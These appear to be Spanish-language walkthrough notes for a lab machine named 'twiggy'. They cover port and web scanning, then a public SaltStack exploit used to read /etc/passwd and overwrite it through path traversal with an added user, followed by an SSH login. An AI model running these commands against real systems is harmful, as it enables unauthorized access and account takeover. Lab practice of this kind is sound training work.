nmap -A -p- -oA twiggy 192.168.68.62 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA twiggy 192.168.68.62
nmap -sU -O -p- -oA twiggy-udp 192.168.68.62
nikto -h 192.168.68.62:80
whatweb http://192.168.68.62/
Vamos a http://192.168.68.62:8000 y solo vemos json
Vamos a http://192.168.68.62/ y trate de logearme con admin:admin y no tuve exito.
searchsploit SaltStack
searchsploit -m 48421
python3 48421.py --master 192.168.68.62 --read /etc/passwd
Creamos un archivo llamado passwd y le agregamos un usuario con contrasena al final + lo que obtuvimos con el comando anterior.
python3 48421.py --master 192.168.68.62 --upload-src passwd --upload-dest ../../../../../etc/passwd
Con el usuario y contrasena en el paso al crear el archivo passwd nos tratamos de logear por ssh
ssh cu3rv0x@192.168.68.62